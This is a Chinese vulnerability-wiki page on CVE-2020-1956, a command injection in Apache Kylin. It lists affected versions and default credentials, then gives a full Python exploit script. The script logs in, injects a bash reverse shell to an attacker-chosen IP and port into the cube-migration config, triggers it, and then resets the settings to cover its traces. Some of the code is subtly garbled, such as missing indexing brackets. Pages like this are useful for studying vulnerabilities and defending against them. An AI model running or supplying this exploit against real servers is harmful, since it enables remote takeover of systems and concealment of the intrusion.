◆◆0

CVE-2020-1956 Apache Kylin 命令注入漏洞

免费、自由、人人可编辑的漏洞库

,

影响版本

Apache Kylin 2.3.0 ~ 2.3.2

Apache Kylin 2.4.0 ~ 2.4.1

Apache Kylin 2.5.0 ~ 2.5.2

Apache Kylin 2.6.0 ~ 2.6.5

Apache Kylin 3.0.0-alpha, Apache Kylin 3.0.0-alpha2, Apache Kylin 3.0.0-beta, Apache Kylin 3.0.0, Kylin 3.0.1

打开后使用默认账号密码登录，出现初始界面即为成功

admin/KYLIN

POC

#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from   : http://wiki.peiqi.tech

import requests
import base64
import sys


def title():
    print('+------------------------------------------')
    print('+  \03334mPOC_Des: http://wiki.peiqi.tech                                   \0330m')
    print('+  \03334mGithub : https://github.com/PeiQi0                                 \0330m')
    print('+  \03334m公众号 : PeiQi文库                                                     \0330m')
    print('+  \03334mVersion: Apache Kylin <= 3.0.1                                    \0330m')
    print('+  \03336m使用格式: python3 CVE-2020-1956                                    \0330m')
    print('+  \03336mUrl    >>> http://xxx.xxx.xxx.xxx:7070                            \0330m')
    print('+  \03336mLogin  >>> admin:KYLIN(格式为User:Pass)                            \0330m')
    print('+------------------------------------------')

def POC_1(target_url):
    login_url = target_url + "/kylin/api/user/authentication"
    user_pass = str(input("\03335mPlease input User and Pass\nLogin >>> \0330m"))

    Authorization = "Basic " + str((base64.b64encode(user_pass.encode('utf-8'))),'utf-8')
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "Authorization": Authorization,
        "Cookie": "project=null"
    }
    try:
        response = requests.post(url=login_url, headers=headers, timeout=20)
        if "password" not in response.text:
            print("\03331mx 账号密码出现错误 \0330m")
            sys.exit(0)
        else:
            print("\03332mo 成功登录，获得JSESSIONID：" + response.cookies"JSESSIONID" + "\0330m")
            return response.cookies"JSESSIONID",Authorization
    except:
        print("\03331mx 漏洞利用失败\0330m")
        sys.exit(0)

def POC_2(target_url, cookie, IP, PORT, Authorization):
    config_url = target_url + "/kylin/api/admin/config"

    key = "kylin.tool.auto-migrate-cube.enabled","kylin.tool.auto-migrate-cube.src-config","kylin.tool.auto-migrate-cube.dest-config"
    value = "true","echo;bash -i >& /dev/tcp/{}/{} 0>&1;echo".format(IP, PORT), "shell"

    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "Authorization": Authorization,
        "Accept": "application/json, text/plain, */*",
        "Content-Type": "application/json;charset=UTF-8",
        "Pragma": "no-cache",
        "Cookie": "project=null;JSESSIONID="+cookie
    }
    for i in range(0,3):
        data = """{"key":"%s","value":"%s"}""" % (keyi, valuei)
        try:
            response = requests.put(url=config_url, headers=headers, data=data, timeout=20)
            if response.status_code == 200:
                print("\03332mo 成功将" + keyi +"设置为" + valuei +"\0330m")
            else:
                print("\03331mx 设置" + keyi +"为" + valuei +"失败\0330m")
                sys.exit(0)
        except:
            print("\03331mx 漏洞利用失败 \0330m")
            sys.exit(0)

def POC_3(target_url, cookie):
    print("\03335mo 正在反弹shell......\0330m")
    vuln_url = target_url + "/kylin/api/cubes/kylin_sales_cube/learn_kylin/migrate"
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "Cookie": "project=null;JSESSIONID=" + cookie
    }
    try:
        response = requests.post(url=vuln_url, headers=headers)
        POC_4(target_url, cookie)
    except:
        print("\03331mx 漏洞利用失败 \0330m")
        sys.exit(0)

def POC_4(target_url, cookie):
    config_url = target_url + "/kylin/api/admin/config"

    key = "kylin.tool.auto-migrate-cube.enabled", "kylin.tool.auto-migrate-cube.src-config",
           "kylin.tool.auto-migrate-cube.dest-config"
    value = "flase", "echo;echo;echo", "None"

    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "Authorization": Authorization,
        "Accept": "application/json, text/plain, */*",
        "Content-Type": "application/json;charset=UTF-8",
        "Pragma": "no-cache",
        "Cookie": "project=null;JSESSIONID=" + cookie
    }

    for i in range(0,3):
        data = """{"key":"%s","value":"%s"}""" % (keyi, valuei)
        try:
            response = requests.put(url=config_url, headers=headers, data=data, timeout=20)
            if response.status_code == 200:
                print("\03332mo 成功将" + keyi +"设置为" + valuei +"\0330m")
            else:
                print("\03331mx 设置" + keyi +"为" + valuei +"失败\0330m")
                sys.exit(0)
        except:
            print("\03331mx 漏洞利用失败 \0330m")
            sys.exit(0)
    print("\03335mo 成功清理痕迹\0330m")


if __name__ == '__main__':
    title()
    target_url = str(input("\03335mPlease input Attack Url\nUrl >>> \0330m"))
    try:
        cookie,Authorization = POC_1(target_url)
    except:
        print("\03331mx 漏洞利用失败 \0330m")
        sys.exit(0)
    IP = str(input("\03335m请输入监听IP   >>> \0330m"))
    PORT = str(input("\03335m请输入监听PORT >>> \0330m"))
    POC_2(target_url, cookie, IP, PORT, Authorization)
    POC_3(target_url, cookie)

参考

https://poc.wgpsec.org/PeiQi_Wiki/Web%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%BC%8F%E6%B4%9E/Apache/Apache%20Kylin/Apache%20Kylin%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CVE-2020-1956.html

pwnwiki.com

返回顶部